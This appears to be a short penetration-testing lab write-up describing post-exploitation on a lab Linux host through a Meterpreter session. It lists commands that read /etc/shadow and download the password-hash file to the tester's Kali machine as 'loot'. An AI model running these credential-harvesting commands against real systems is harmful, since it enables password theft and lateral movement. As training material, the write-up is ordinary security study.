Objective: To leverage administrative access to extract the system’s “Shadow” file, demonstrating the ability to harvest encrypted credentials for offline analysis.
1. The Post-Exploitation Phase
Once the initial shell was established on the target (192.168.56.101), the focus shifted to Data Exfiltration. In Linux environments, the most critical file for an attacker is /etc/shadow, which contains the encrypted password hashes for every user on the system.
2. Technical Challenges & Solutions
During the session, I encountered a platform-specific limitation where the standard Metasploit priv extension (designed for Windows) was unavailable for this Linux target. I successfully adapted by utilizing native Linux commands to bypass the tool’s limitations.
| Target File | Permission Required | Data Content |
|---|---|---|
/etc/passwd | Read (All Users) | Usernames and UID information. |
/etc/shadow | Root Only | Encrypted password hashes and salt. |
3. Execution Workflow
- Identity Verification: Confirmed administrative status by executing
whoami(Result:root). - Bypassing Tool Limitations: Instead of relying on automated “hashdump” scripts, I manually accessed the sensitive file structure.
- File Read & Capture: Used the
catcommand to display the contents of the shadow file directly in the terminal for manual capture. - Secure Download: Utilized the Meterpreter
downloadcommand to pull the file from the victim’s infrastructure to my local Kali workspace for evidence preservation.
4. Key Commands Used
getuid: To verify the current session’s privilege level (User: 0 / Root).cat /etc/shadow: To read the encrypted password store.download /etc/shadow /home/sophy/Desktop/shadow_loot.txt: To exfiltrate the data to a secure local directory.


5. Professional Impact
This project highlights a “Pivot-Mindset”—the ability to troubleshoot technical hurdles (like unsupported extensions) and still achieve the objective using core operating system knowledge. By successfully extracting the /etc/shadow file, I demonstrated the final stage of a system compromise: the theft of “Identities,” which could lead to further lateral movement across the entire corporate network.